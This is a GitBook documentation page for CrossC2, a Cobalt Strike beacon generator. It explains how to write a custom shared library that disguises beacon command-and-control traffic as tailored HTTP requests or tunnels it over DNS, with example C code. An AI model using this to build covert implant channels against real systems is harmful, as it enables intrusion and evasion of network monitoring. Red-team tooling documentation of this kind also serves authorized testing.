
<!DOCTYPE HTML>
<html lang="en" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>Protocol API · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="../../gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../../gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="../../gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="../redteam/README.md" />
    
    
    <link rel="prev" href="../api/example_demo.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="../">
            
                <a href="../">
            
                    
                    Introduction
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="../install/">
            
                <a href="../install/">
            
                    
                    Install
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="../usage/">
            
                <a href="../usage/">
            
                    
                    Usage
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.3.1" data-path="../usage/cna.html">
            
                <a href="../usage/cna.html">
            
                    
                    cna
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="../usage/genCross.html">
            
                <a href="../usage/genCross.html">
            
                    
                    direct run
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.3" data-path="../usage/iOS.html">
            
                <a href="../usage/iOS.html">
            
                    
                    iOS
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="../usage/android.html">
            
                <a href="../usage/android.html">
            
                    
                    Android
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="../api/">
            
                <a href="../api/">
            
                    
                    API
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.1" data-path="../api/commons.html">
            
                <a href="../api/commons.html">
            
                    
                    Variable definitions
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.2" data-path="../api/cna_demo.html">
            
                <a href="../api/cna_demo.html">
            
                    
                    cna Demo
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.3" data-path="../api/c_demo.html">
            
                <a href="../api/c_demo.html">
            
                    
                    C/C++ Demo
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.4" data-path="../api/go_demo.html">
            
                <a href="../api/go_demo.html">
            
                    
                    Golang Demo
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.5" data-path="../api/example_demo.html">
            
                <a href="../api/example_demo.html">
            
                    
                    Example
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.5.1" data-path="../api/example_demo.html">
            
                <a href="../api/example_demo.html#portscan">
            
                    
                    portscan
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.5.2" data-path="../api/example_demo.html">
            
                <a href="../api/example_demo.html#keystrokes">
            
                    
                    keystrokes
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter active" data-level="1.5" data-path="./">
            
                <a href="./">
            
                    
                    Protocol API
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.6" data-path="../redteam/README.md">
            
                <span>
            
                    
                    RedTeam
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.6.1" data-path="../redteam/shellcode_call_crossc2.html">
            
                <a href="../redteam/shellcode_call_crossc2.html">
            
                    
                    use shellcode
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.6.2" data-path="../redteam/attack_macos.html">
            
                <a href="../redteam/attack_macos.html">
            
                    
                    attack MacOS
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href=".." >Protocol API</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="custom-communication-protocol">Custom communication protocol</h1>
<p>CrossC2 reserves the communication protocol API, which can be specified to implement c2profile settings and custom protocols.</p>
<h2 id="instructions">Instructions</h2>
<p>After writing the corresponding communication protocol implementation, use gcc/clang test.c -fPIC -shared -o lib_rebind_test.so to compile and generate a dynamic library.
When generating a beacon, the rebind_dynamic_lib option in cna or genCrossC2 specifies the dynamic library just generated <code>lib_rebind_test.so</code>, and the last generated beacon will send communication packets according to the protocol implementation in the specified dynamic library.</p>
<h2 id="https-communication-template-modification">HTTPs communication template modification</h2>
<p>Corresponding to the 4 setting options in <strong>C2Profile</strong></p>
<pre><code>http-get { 
    client(send) { metadata{} }
    server(recv) { output{} }
}
http-post { 
    client(send) { 
        id {} 
        output {} 
    }
    server(recv) { output{} }
}
</code></pre><pre><code>void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);

cc2_rebind_http_x_send Series functions: 
    Encapsulate the incoming base64(metadata) data and return the complete HTTP structure data
    `*reqData` Is the data to be requested after base64(metadata field)       - C2Profile http-get { client { (metadata) } } 
    `**outputData` Return the actual HTTP content that needs to be sent

cc2_rebind_http_x_recv Series functions:
    Parse the incoming HTTP structure data and return the base64(output) data
    `*resData` Is the complete HTTP content returned by the server
    `**outputData` Returns the actual content contained in the HTTP content (output field after base64 encoding)     -C2Profile http-get {server {(output)}}
</code></pre><h2 id="communication-protocol-customization">Communication protocol customization</h2>
<pre><code>void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);

cc2_rebind_x_protocol Series functions:
    After the incoming original data is sent to and received from the custom communication, the obtained base64(output) data is returned
    `*resData` Is the data to be requested after base64 (metadata field / id + output field)
    `**outputData` It is the server response data(output field) after base64
</code></pre><h2 id="ex">Ex:</h2>
<h3 id="https-communication-template-customization">HTTPs communication template customization:</h3>
<pre><code>
void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf(&quot;------ custom http get send ------\n&quot;);
    char *requestTample = &quot;GET /%s HTTP/1.1\r\n&quot;
        &quot;Host: http.cc2.com\r\n&quot;
        &quot;Accept: gzip, deflate\r\n&quot;
        &quot;User-Agent: cc2_rebind_http_get_send\r\n&quot;
        &quot;Cookie: %s\r\n&quot;
        &quot;Connection: cc2_rebind_http_get_send\r\n\r\n&quot;;
    char postPayload[20000];
    sprintf(postPayload, requestTample, &quot;test&quot;, reqData);

    // Write the generated HTTP data to outputData
    *outputData_len =  strlen(postPayload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, postPayload, *outputData_len);

    printf(&quot;-------------------------\n&quot;);
}

void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf(&quot;------ custom http get recv ------\n&quot;);

    // rawData = &quot;HTTP/1.1 200 OK
    // Date: Tue, 26 May 2020 10:12:28 GMT
    // Server: CC2_server
    // Content-Length: 32
    // Connection: close
    // Content-Type: text/html; charset=iso-8859-1
    //
    // XXXXZZZZXXXXAAAZZ==

    char *payload = find_pay(rawData, rawData_len); // return &quot;XXXXZZZZXXXXAAAZZ==&quot;

    *outputData_len = strlen(payload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, payload, *outputData_len);

    printf(&quot;-------------------------\n&quot;);
}
</code></pre><h3 id="communication-protocol-customization">Communication protocol customization</h3>
<pre><code>void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf(&quot;------ custom get protocol ------\n&quot;);
    sendDNS(&quot;127.0.0.1&quot;, 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len &gt; 0) {
        printf(&quot;cobaltstrike cc2_server response(%d): \n&quot;, *outputData_len);
    }
    printf(&quot;------ custom protocol ------\n&quot;);
}
</code></pre>
                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="../api/example_demo.html#keystrokes" class="navigation navigation-prev " aria-label="Previous page: keystrokes">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="../redteam/README.md" class="navigation navigation-next " aria-label="Next page: RedTeam">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"Protocol API","level":"1.5","depth":1,"next":{"title":"RedTeam","level":"1.6","depth":1,"path":"redteam/README.md","ref":"redteam/README.md","articles":[{"title":"use shellcode","level":"1.6.1","depth":2,"path":"redteam/shellcode_call_crossc2.md","ref":"redteam/shellcode_call_crossc2.md","articles":[]},{"title":"attack MacOS","level":"1.6.2","depth":2,"path":"redteam/attack_macos.md","ref":"redteam/attack_macos.md","articles":[]}]},"previous":{"title":"keystrokes","level":"1.4.5.2","depth":3,"anchor":"#keystrokes","path":"api/example_demo.md","ref":"api/example_demo.md#keystrokes","articles":[]},"dir":"ltr"},"config":{"plugins":[],"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"pluginsConfig":{"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"theme":"default","pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"variables":{},"language":"en","gitbook":"*"},"file":{"path":"protocol/README.md","mtime":"2020-05-27T03:20:52.655Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-05-27T06:15:38.542Z"},"basePath":"..","book":{"language":"en"}});
        });
    </script>
</div>

        
    <script src="../../gitbook/gitbook.js"></script>
    <script src="../../gitbook/theme.js"></script>
    
        
        <script src="../../gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

